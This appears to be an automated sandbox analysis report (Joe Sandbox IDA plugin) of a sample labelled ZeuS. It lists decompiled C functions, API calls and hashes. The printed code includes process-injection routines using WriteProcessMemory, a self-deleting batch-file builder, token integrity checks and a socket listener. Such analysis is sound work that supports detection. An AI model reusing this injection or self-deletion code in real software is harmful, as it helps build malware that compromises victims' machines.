0x0040cf7e
0x0040cf80
0x0040cf86
0x0040cf86
0x0040cde8
0x0040cded
0x0040cdff
0x0040ce05
0x0040ce42
0x0040ce47
0x0040ce4e
0x0040ce58
0x0040ce5d
0x0040ce5d
0x0040ce67
0x0040ce6b
0x0040ce6f
0x0040ce79
0x0040ce7b
0x0040ce7f
0x0040ce7f
0x0040ce83
0x0040ce89
0x0040ce8b
0x0040ce8f
0x0040ce93
0x0040ce93
0x0040cea3
0x0040ceab
0x0040cf51
0x0040cf55
0x0040cf6a
0x0040cf73
0x00000000
0x0040ceb1
0x0040ceb1
0x0040ceb7
0x0040cec1
0x0040cec9
0x0040ced5
0x0040cf29
0x0040cf29
0x0040cf2f
0x0040cf31
0x0040cf36
0x00000000
0x00000000
0x0040cee4
0x0040cf00
0x0040cf04
0x0040cf0b
0x0040cf22
0x0040cf24
0x0040cf24
0x0040cf22
0x0040cf43
0x0040cf4b
0x00000000
0x00000000
0x00000000
0x0040cf4b
0x0040ced7
0x0040cedb
0x0040cedb
0x00000000
0x0040cedb
0x0040cecb
0x00000000
0x0040cecb
0x00000000
0x0040ceb7
0x0040ceab
0x0040ce07
0x0040ce1f
0x0040ce31
0x0040ce37
0x00000000
0x00000000
0x00000000
0x0040ce37
0x0040ce3c
0x00000000
0x00000000
0x00000000
0x0040ce3c
0x0040cdd0
0x00000000

APIs

Part of subcall function 0041C97E: CreateMutexW.KERNEL32(004239E8,00000000,?,?,?,?,?), ref: 0041C99F

WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 0040CE12
WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 0040CEA3
accept.WS2_32(?,00000000,00000000), ref: 0040CF2F
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 0040CF43
CloseHandle.KERNEL32(?), ref: 0040CF64
CloseHandle.KERNEL32(?), ref: 0040CF73

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
String ID:
API String ID: 38240579-0
Opcode ID: 1590263d4af4385d947001dcb9c5136b30fd3c28dabf87e243ca0a068daf7e01
Instruction ID: 5bd0a52fe06a59c330cb6f030770cd991f1b5d25e7ae2fe88c26a7f81e190e28
Opcode Fuzzy Hash: 1590263d4af4385d947001dcb9c5136b30fd3c28dabf87e243ca0a068daf7e01
Instruction Fuzzy Hash: 4D516C71508201EBC720EB66DD84C6FB7E9EB85704F200A3EF595A31A0D734DD458B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00404FF7, Relevance: 12.1, APIs: 8, Instructions: 114
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404FF7() {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				long _v580;
				void* _v588;
				void* __esi;
				void* _t42;
				struct tagPROCESSENTRY32W* _t45;
				signed int _t47;
				void* _t48;
				long _t65;
				int _t71;
				void** _t72;
				void* _t73;

				_t71 = 0;
				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				while(1) {
					_t42 = CreateToolhelp32Snapshot(2, _t71);
					_v20 = _t42;
					_v24 = _t71;
					if(_t42 == 0xffffffff) {
						break;
					} else {
						_t45 =  &_v588;
						_v588 = 0x22c;
						Process32FirstW(_v20, _t45);
					}
					while(_t45 != 0) {
						_t65 = _v580;
						if(_t65 <= _t71 || _t65 ==  *0x423c20) {
							L20:
							_t45 = Process32NextW(_v20,  &_v588);
							continue;
						} else {
							_t47 = 0;
							if(_v12 <= _t71) {
								L8:
								_t48 = E0041C8D5(_t65, _t70, _t65);
								_v28 = _t48;
								if(_t48 != _t71) {
									_t73 = OpenProcess(0x400, _t71, _v580);
									if(_t73 != _t71) {
										_t72 = E004067FD(_t65, _t73,  &_v32);
										CloseHandle(_t73);
										if(_t72 != 0) {
											if(_v32 ==  *0x4239c0 && GetLengthSid( *_t72) ==  *0x4239b8 && E00405257( *((intOrPtr*)( *0x4239b4)),  *_t72, _t56) == 0 && E00405171(4 + _v12 * 4,  &_v16) != 0) {
												_t70 = _v12;
												_v12 = _v12 + 1;
												_v24 = _v24 + 1;
												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v580;
												if(E00404F6E(_v16, _v580, _v28) != 0) {
													_v5 = 1;
												}
											}
											E004051E6(_t72);
										}
										_t71 = 0;
									}
									CloseHandle(_v28);
								}
								goto L20;
							} else {
								goto L6;
							}
							while(1) {
								L6:
								_t70 = _v16;
								if( *((intOrPtr*)(_v16 + _t47 * 4)) == _t65) {
									goto L20;
								}
								_t47 = _t47 + 1;
								if(_t47 < _v12) {
									continue;
								}
								goto L8;
							}
							goto L20;
						}
					}
					CloseHandle(_v20);
					if(_v24 != _t71) {
						continue;
					}
					break;
				}
				E004051E6(_v16);
				return _v5;
			}

0x00405009
0x0040500b
0x0040500f
0x00405012
0x00405015
0x00405018
0x0040501e
0x00405021
0x00405027
0x00000000
0x0040502d
0x0040502d
0x00405037
0x00405041
0x00405041
0x0040514b
0x0040504c
0x00405054
0x0040513b
0x00405145
0x00000000
0x00405066
0x00405066
0x0040506b
0x0040507f
0x00405080
0x00405085
0x0040508a
0x004050a2
0x004050a6
0x004050b7
0x004050b9
0x004050bd
0x004050c8
0x00405103
0x00405112
0x00405115
0x00405118
0x00405128
0x0040512a
0x0040512a
0x00405128
0x0040512f
0x0040512f
0x00405134
0x00405134
0x00405139
0x00405139
0x00000000
0x00000000
0x00000000
0x00000000
0x0040506d
0x0040506d
0x0040506d
0x00405073
0x00000000
0x00000000
0x00405079
0x0040507d
0x00000000
0x00000000
0x00000000
0x0040507d
0x00000000
0x0040506d
0x00405054
0x00405156
0x0040515b
0x00000000
0x00000000
0x00000000
0x0040515b
0x00405164
0x00405170

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00405018
Process32FirstW.KERNEL32(?,?), ref: 00405041
OpenProcess.KERNEL32(00000400,00000000,?,?,?,74B5F560,00000000), ref: 0040509C
CloseHandle.KERNEL32(00000000,00000000,?,?,74B5F560,00000000), ref: 004050B9
GetLengthSid.ADVAPI32(00000000,?,74B5F560,00000000), ref: 004050CC
CloseHandle.KERNEL32(?,?,74B5F560,00000000), ref: 00405139
Process32NextW.KERNEL32(?,0000022C), ref: 00405145
CloseHandle.KERNEL32(?,?,74B5F560,00000000), ref: 00405156

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 1981844004-0
Opcode ID: 8c86a0ef3a2a725d7cbd530d1159b5c2a6015a43fb53d3fbe74db6e218ecd4a2
Instruction ID: aada025cae0c4f7f853e621d05e2eb69bc6c9742fe0e4c4e8dd0ac449aefde2b
Opcode Fuzzy Hash: 8c86a0ef3a2a725d7cbd530d1159b5c2a6015a43fb53d3fbe74db6e218ecd4a2
Instruction Fuzzy Hash: 4E415C70D04519ABCF21EFA4DC84AAFBB76FF85304F1001AAE555B72A0D7395A81CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8D1, Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E8D1(int __eax, long __ecx, void* __edx) {
				struct HWND__* _v8;
				signed short _v12;
				int _v16;
				long _v20;
				struct tagPOINT _v28;
				intOrPtr _t46;
				int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				void* _t74;
				long _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t80 = __edx;
				_t73 = __eax;
				_t78 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t80 + 0x10));
				_v8 =  *((intOrPtr*)(_t46 + 0x108));
				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
				ReleaseMutex( *(_t80 + 0x14));
				_t50 = GetWindowRect(_v8,  &_v28);
				if(_t50 != 0) {
					if(_v12 != 2) {
						_t51 = _v12 & 0x0000ffff;
						__eflags = _t51 - 0xd;
						if(__eflags > 0) {
							_t52 = _t51 - 0xe;
							__eflags = _t52;
							if(_t52 == 0) {
								_v20 = _t78;
								goto L22;
							} else {
								_t63 = _t52 - 1;
								__eflags = _t63;
								if(_t63 == 0) {
									_v16 = _t73;
								} else {
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_v16 = _t73;
										goto L19;
									} else {
										__eflags = _t64 == 1;
										if(_t64 == 1) {
											goto L16;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L11:
								_v28.x = _t78;
								goto L22;
							} else {
								_t67 = _t51;
								__eflags = _t67;
								if(_t67 == 0) {
									goto L11;
								} else {
									_t69 = _t67;
									__eflags = _t69;
									if(_t69 == 0) {
										L16:
										_v16 = _t73;
										goto L17;
									} else {
										_t70 = _t69 - 6;
										__eflags = _t70;
										if(_t70 == 0) {
											L19:
											_v28.x = _t78;
										} else {
											_t71 = _t70 - 1;
											__eflags = _t71;
											if(_t71 == 0) {
												L17:
												_v20 = _t78;
											} else {
												__eflags = _t71 == 1;
												if(_t71 == 1) {
													L22:
													_v28.y = _t73;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t81 =  *((intOrPtr*)(_t80 + 0x10));
						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
						_v28.x = _v28.x + _t79;
						_v28.y = _v28.y + _t74;
						_v20 = _v20 + _t79;
						_v16 = _v16 + _t74;
					}
					_t50 = IsRectEmpty( &_v28);
					if(_t50 == 0) {
						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
						}
						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
					}
				}
				return _t50;
			}

0x0040e8da
0x0040e8e1
0x0040e8e3
0x0040e8e5
0x0040e8eb
0x0040e8fe
0x0040e901
0x0040e904
0x0040e911
0x0040e919
0x0040e924
0x0040e943
0x0040e947
0x0040e94a
0x0040e968
0x0040e968
0x0040e96b
0x0040e98b
0x00000000
0x0040e96d
0x0040e96d
0x0040e96d
0x0040e96e
0x0040e986
0x0040e970
0x0040e970
0x0040e970
0x0040e971
0x0040e97e
0x00000000
0x0040e973
0x0040e973
0x0040e974
0x00000000
0x00000000
0x0040e974
0x0040e971
0x0040e96e
0x0040e94c
0x0040e94c
0x0040e963
0x0040e963
0x00000000
0x0040e94e
0x0040e94f
0x0040e94f
0x0040e950
0x00000000
0x0040e952
0x0040e953
0x0040e953
0x0040e954
0x0040e976
0x0040e976
0x00000000
0x0040e956
0x0040e956
0x0040e956
0x0040e959
0x0040e981
0x0040e981
0x0040e95b
0x0040e95b
0x0040e95b
0x0040e95c
0x0040e979
0x0040e979
0x0040e95e
0x0040e95e
0x0040e95f
0x0040e98e
0x0040e98e
0x0040e98e
0x0040e95f
0x0040e95c
0x0040e959
0x0040e954
0x0040e950
0x0040e94c
0x0040e926
0x0040e926
0x0040e929
0x0040e92f
0x0040e935
0x0040e938
0x0040e93b
0x0040e93e
0x0040e93e
0x0040e995
0x0040e99d
0x0040e9af
0x0040e9c3
0x0040e9c3
0x00000000
0x0040e9e7
0x0040e99d
0x0040e9f1

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040E8E5
ReleaseMutex.KERNEL32(?), ref: 0040E904
GetWindowRect.USER32 ref: 0040E911
IsRectEmpty.USER32(?), ref: 0040E995
GetWindowLongW.USER32(?,000000F0), ref: 0040E9A4
GetParent.USER32(?), ref: 0040E9BA
MapWindowPoints.USER32 ref: 0040E9C3
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040E9E7

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
String ID:
API String ID: 2634726239-0
Opcode ID: 6b6c43b12c0a30725b78ee35ff5d57d0414fc516184589c1d19d85446a3141f4
Instruction ID: 93cd0cad5809ab13b5db98570f55185eb26e9717d0758e792d8c0aae3b8d2bb7
Opcode Fuzzy Hash: 6b6c43b12c0a30725b78ee35ff5d57d0414fc516184589c1d19d85446a3141f4
Instruction Fuzzy Hash: CB415EB1C0420ADFDB508FAAC949ABFBBB4FB04350F10097AEA51B22A0C7749951DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040B790, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040B790(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, char _a12, void* _a16, long _a20, void* _a24) {
				int _v8;
				void* _t37;
				long _t38;
				struct HBITMAP__* _t46;
				void* _t47;
				signed int _t56;
				signed int _t57;
				BITMAPINFO** _t62;
				BITMAPINFO* _t64;

				_t57 = __edx;
				_v8 = 0;
				_t64 = E004051B6(0x428);
				if(_t64 == 0) {
					L14:
					if(_a24 != 0) {
						DeleteObject(_a24);
					}
					L16:
					return _v8;
				}
				_t64->bmiHeader = 0x28;
				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
					L13:
					E004051E6(_t64);
					goto L14;
				} else {
					DeleteObject(_a24);
					asm("cdq");
					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
					_a24 = 0;
					_t64->bmiHeader.biHeight = _t56;
					if(_t37 == 0) {
						L7:
						_t64->bmiHeader.biClrUsed = 0;
						_push(8);
						_t64->bmiHeader.biClrImportant = 0;
						L8:
						_pop(_t38);
						_t64->bmiHeader.biBitCount = _t38;
						L9:
						_t62 = _a8;
						asm("cdq");
						_t58 = _t57 & 0x00000007;
						asm("cdq");
						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
						_t64->bmiHeader.biCompression = 0;
						if(_t62 != 0) {
							 *_t62 = _t64;
						}
						_t21 =  &_a12; // 0x423258
						_t46 = CreateDIBSection(_a4, _t64, 0,  *_t21, _a16, _a20);
						_v8 = _t46;
						if(_t46 == 0 || _t62 == 0) {
							goto L13;
						} else {
							goto L16;
						}
					}
					_t47 = _t37 - 3;
					if(_t47 == 0) {
						goto L7;
					}
					if(_t47 != 0x14) {
						goto L9;
					}
					_push(0x20);
					goto L8;
				}
			}

0x0040b790
0x0040b79e
0x0040b7a6
0x0040b7aa
0x0040b872
0x0040b875
0x0040b87a
0x0040b87a
0x0040b880
0x0040b887
0x0040b887
0x0040b7bf
0x0040b7cc
0x0040b86c
0x0040b86d
0x00000000
0x0040b7e8
0x0040b7eb
0x0040b7f4
0x0040b7ff
0x0040b801
0x0040b802
0x0040b805
0x0040b808
0x0040b818
0x0040b818
0x0040b81b
0x0040b81d
0x0040b820
0x0040b820
0x0040b821
0x0040b825
0x0040b82d
0x0040b833
0x0040b834
0x0040b83c
0x0040b841
0x0040b844
0x0040b849
0x0040b84b
0x0040b84b
0x0040b853
0x0040b85b
0x0040b861
0x0040b866
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b866
0x0040b80a
0x0040b80d
0x00000000
0x00000000
0x0040b812
0x00000000
0x00000000
0x0040b814
0x00000000
0x0040b814

APIs

GetDIBits.GDI32(00000000,0040D49C,00000000,00000001,00000000,00000000,00000000), ref: 0040B7C8
GetDIBits.GDI32(00000000,0040D49C,00000000,00000001,00000000,00000000,00000000), ref: 0040B7DE
DeleteObject.GDI32(0040D49C), ref: 0040B7EB
CreateDIBSection.GDI32(?,00000000,00000000,X2B,2937498D,?), ref: 0040B85B
DeleteObject.GDI32(0040D49C), ref: 0040B87A

Strings

X2B, xrefs: 0040B853

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: BitsDeleteObject$CreateSection
String ID: X2B
API String ID: 1423349713-3897348823
Opcode ID: 6935475bb1cac5ea8b57b740d3f029f22b651f57ede845240fdef125084c84d5
Instruction ID: 152b8cf27009f976b5e8f6f7612a74027960e92f6422b972dc82a4fd5e2095f5
Opcode Fuzzy Hash: 6935475bb1cac5ea8b57b740d3f029f22b651f57ede845240fdef125084c84d5
Instruction Fuzzy Hash: 2231B37250120AAFDB20AF65CD8496B7EE9EF44344B04C43EF985A62B0C735DD50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9B9, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87
injectionCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0041C9B9(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
				char _v5;
				void _v12;
				void _t26;
				void _t43;
				void* _t51;
				void* _t52;

				_t52 = __esi;
				_t51 = __edi;
				_t26 = E00409B46( *0x4239c4, __edi);
				_v12 = _t26;
				if(_t26 != 0) {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_a8 = _a8 |  *0x4239b0 & 0x00000014;
					_push(_t52);
					if(WriteProcessMemory(_t51, 0x4239b0 -  *0x4239c4 + _v12,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t51, 0x4239c4 -  *0x4239c4 + _v12,  &_v12, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(E0041C197(0x423e74, _t51, _v12,  *0x423e74) == 0) {
						_v5 = _v5 + 1;
					}
					if(E0041C197(0x423e78, _t51, _v12,  *0x423e78) == 0) {
						_v5 = _v5 + 1;
					}
					if(_v5 == 0) {
						_t43 = _v12;
					} else {
						VirtualFreeEx(_t51, _v12, 0, 0x8000);
						goto L1;
					}
				} else {
					L1:
					_t43 = 0;
				}
				return _t43;
			}

0x0041c9b9
0x0041c9b9
0x0041c9c5
0x0041c9cc
0x0041c9d1
0x0041c9e6
0x0041c9f3
0x0041c9f5
0x0041c9f5
0x0041ca01
0x0041ca04
0x0041ca26
0x0041ca28
0x0041ca28
0x0041ca47
0x0041ca49
0x0041ca49
0x0041ca62
0x0041ca64
0x0041ca64
0x0041ca7d
0x0041ca7f
0x0041ca7f
0x0041ca85
0x0041ca9c
0x0041ca87
0x0041ca91
0x00000000
0x0041ca91
0x0041c9d3
0x0041c9d3
0x0041c9d3
0x0041c9d3
0x0041caa1

APIs

Part of subcall function 00409B46: IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 00409B62

DuplicateHandle.KERNEL32(000000FF,74B5F560,00000000,74B5F560,00000000,00000000,00000002,00000000,00000000,?,?,?,00404F98,?,00000000,?), ref: 0041C9EB
WriteProcessMemory.KERNEL32(00000000,74B5F560,?,00000004,00000000,?,?,?,?,00404F98,?,00000000,?,?,00405126,?), ref: 0041CA22
WriteProcessMemory.KERNEL32(00000000,74B5F560,74B5F560,00000004,00000000,?,?,?,00404F98,?,00000000,?,?,00405126,?,?), ref: 0041CA42
VirtualFreeEx.KERNEL32(00000000,74B5F560,00000000,00008000,00000000,74B5F560,00000000,74B5F560,?,?,00404F98,?,00000000,?,?,00405126), ref: 0041CA91

Strings

x>B, xrefs: 0041CA6D
t>B, xrefs: 0041CA52

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
String ID: t>B$x>B
API String ID: 2215616122-900562162
Opcode ID: 6152c06072b29db1ae21e06b12bd58e4d6426c39aeb0732ba8daf5bcf876980a
Instruction ID: 566495e6fded9885ec3e17b151fc3ed65e893a863b42b24250469881bea39cea
Opcode Fuzzy Hash: 6152c06072b29db1ae21e06b12bd58e4d6426c39aeb0732ba8daf5bcf876980a
Instruction Fuzzy Hash: 0C21E6B2A44148BADB02CFA4DC81FFFBF78EF1A745F004096F600A2151D3795A868B28

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA6, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00406CA6(void* __ebx, void* __edi, char _a4) {
				short _v24;
				intOrPtr _v28;
				char _v72;
				short _v592;
				char _v852;
				char _v1392;
				void* _t35;
				char _t56;

				if(E0040A569(L"bat",  &_v592) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v592,  &_v852);
				_push( &_v852);
				if(E00405FAA( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
					L6:
					E0040A548( &_v592);
					goto L7;
				}
				_t35 = E0040A39D( &_v592, _a4, _t31);
				E004051E6(_a4);
				if(_t35 == 0) {
					goto L6;
				}
				_push(__edi);
				_push( &_v592);
				if(E00405ED9( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t56 = 0x44;
					E00405299( &_v72,  &_v72, 0, _t56);
					_v24 = 0;
					_v72 = _t56;
					_v28 = 1;
					return E00406AAD( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
				}
			}

0x00406cc2
0x00406db4
0x00000000
0x00406db4
0x00406cd6
0x00406ce2
0x00406cfa
0x00406da8
0x00406daf
0x00000000
0x00406daf
0x00406d0c
0x00406d16
0x00406d1e
0x00000000
0x00000000
0x00406d24
0x00406d2b
0x00406d47
0x00000000
0x00406d68
0x00406d6a
0x00406d72
0x00406d7a
0x00406d92
0x00406d95
0x00000000
0x00406da3

APIs

Part of subcall function 0040A569: GetTempPathW.KERNEL32(000000F6,?), ref: 0040A580

CharToOemW.USER32 ref: 00406CD6

Part of subcall function 0040A39D: CreateFileW.KERNEL32(00406CC0,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040A5DC,00406CC0,00000000,00000000,00406CC0,?), ref: 0040A3B7
Part of subcall function 0040A39D: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A5DC,00406CC0,00000000,00000000,00406CC0,?), ref: 0040A3DA
Part of subcall function 0040A39D: CloseHandle.KERNEL32(00000000,?,0040A5DC,00406CC0,00000000,00000000,00406CC0,?), ref: 0040A3E7

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00406D5A

Strings

bat, xrefs: 00406CB6
/c "%s", xrefs: 00406D2C
ComSpec, xrefs: 00406D55
@echo off%sdel /F "%s", xrefs: 00406CE9

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
API String ID: 1639923935-3344086482
Opcode ID: e1d9e0a093d60fa402946580ae0dbf5b80ad392d376683bab301abdd757d4350
Instruction ID: 8ecae1cbe105802aa65f514ed3cbe2352667d5b1e7ac0b7862ad85de1975928b
Opcode Fuzzy Hash: e1d9e0a093d60fa402946580ae0dbf5b80ad392d376683bab301abdd757d4350
Instruction Fuzzy Hash: 752181B19012186EDF10EAA4CC46EEF77ACEF04315F2041B7B509F20D0D6389B558B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040693A, Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040693A(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t21;
				signed char _t22;
				DWORD* _t25;
				void* _t32;

				_t28 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
					L14:
					return _t28;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L13:
					CloseHandle(_v12);
					goto L14;
				} else {
					_t32 = E004051B6(_v8);
					if(_t32 == 0) {
						L12:
						goto L13;
					}
					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
						_t21 = GetSidSubAuthorityCount( *_t32);
						if(_t21 != 0) {
							_t22 =  *_t21;
							if(_t22 > 0) {
								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t28 = 3;
									} else {
										_t28 = 1;
									}
								}
							}
						}
					}
					E004051E6(_t32);
					goto L12;
				}
			}

0x00406948
0x00406952
0x004069e8
0x004069ec
0x004069ec
0x0040696e
0x004069de
0x004069e1
0x00000000
0x0040697b
0x00406984
0x00406988
0x004069dd
0x00000000
0x004069dd
0x0040699b
0x0040699f
0x004069a7
0x004069a9
0x004069ad
0x004069b6
0x004069be
0x004069c7
0x004069d2
0x004069d4
0x004069c9
0x004069c9
0x004069c9
0x004069c7
0x004069be
0x004069ad
0x004069a7
0x004069d8
0x00000000
0x004069d8

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000001,?,?,?,?,0041C28A,00000000,0041C766), ref: 0040694A
GetTokenInformation.ADVAPI32(00000001,00000019(TokenIntegrityLevel),00000000,00000000,00000000,74B04EE0,?,?,?,0041C28A,00000000,0041C766), ref: 0040696A
GetLastError.KERNEL32(?,?,?,0041C28A,00000000,0041C766), ref: 00406970
GetTokenInformation.ADVAPI32(00000001,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 00406997
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,0041C28A,00000000,0041C766), ref: 0040699F
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,0041C28A,00000000,0041C766), ref: 004069B6
CloseHandle.KERNEL32(00000001,?,?,?,0041C28A,00000000,0041C766), ref: 004069E1

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
String ID:
API String ID: 3714493844-0
Opcode ID: b2ef6e4b1d648e4f3cfc1034f6bf8560e4fc26bb4c172c2735d596bc5b81f5cf
Instruction ID: 904c498ea62c2aa3affa1e21d4df142b50673bf27f3c92195cbe654f364c19c3
Opcode Fuzzy Hash: b2ef6e4b1d648e4f3cfc1034f6bf8560e4fc26bb4c172c2735d596bc5b81f5cf
Instruction Fuzzy Hash: B511BEB1500058BFEB115BA0CD84EBE3B6DEB01304F100073F542FA5A0D7398E95EB28

Uniqueness

Uniqueness Score: -1.00%

